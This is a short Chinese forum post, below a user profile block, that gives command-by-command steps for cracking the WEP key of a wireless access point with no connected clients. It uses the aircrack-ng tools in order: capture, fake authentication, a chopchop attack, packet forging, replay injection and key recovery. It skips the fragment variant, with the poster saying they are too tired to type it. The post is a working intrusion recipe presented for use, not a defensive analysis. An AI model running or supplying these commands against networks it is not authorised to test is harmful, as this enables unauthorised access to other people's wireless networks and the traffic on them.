上校

- 注册时间
- 2010-1-1
- 金币
- 7287 个
- 威望
- 96 个
- 荣誉
- 2 个
累计签到:2 天 连续签到:0 天 [LV.20]漫游旅程
|
ifconfig wlan0 up
airmon-ng wlan0 up
无客户端chopchop攻击步骤:
1.airodump-ng --ivs -c 频道 -w 抓包文件名 wlano
2.另外开启shell,进行fakeauth攻击,原理是建立虚拟验证连接,便于实现注入数据包攻击。
aireplay-ng -1 0 -e AP's ESSID -a AP's Mac -h client'sMac wlan0
3.然后进行chopchop攻击,生成可用的密钥数据流文件。再开启一个shell
aireplay-ng -4 -b ap‘s mac -h client’s mac wlan0
4.使用packerforge-ng工具构造对该ap生效的注入数据包
Packetforge-ng -0 -a AP's MAC -h Client's MAC -k 255.255.255.255 -1 255.255.255.255 -y fragment xor file -w writetofile
aireplay-ng -2 -r writetofile wlan0
5.开启aircrack-ng进行同步wepPJ
aircrack-ng 文件名*.ivs
无客户端Fragment攻击
略
打的累了,不告诉你了。 |
|